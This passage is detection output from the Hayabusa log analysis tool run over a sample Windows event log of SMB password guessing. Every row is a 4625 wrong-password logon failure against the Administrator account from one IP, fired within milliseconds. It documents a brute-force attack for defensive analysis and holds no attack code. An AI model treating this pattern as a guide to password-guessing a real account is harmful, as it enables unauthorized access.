+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.434 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.556 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.636 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.677 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.710 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.793 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.871 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.926 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:52.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.014 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.053 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.126 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.166 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.209 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.301 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.336 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.380 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.429 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.478 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.524 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.616 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.660 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.711 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.912 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.204 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.514 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.739 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.808 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.937 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.013 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.054 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.123 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.200 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.330 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.510 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.655 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: 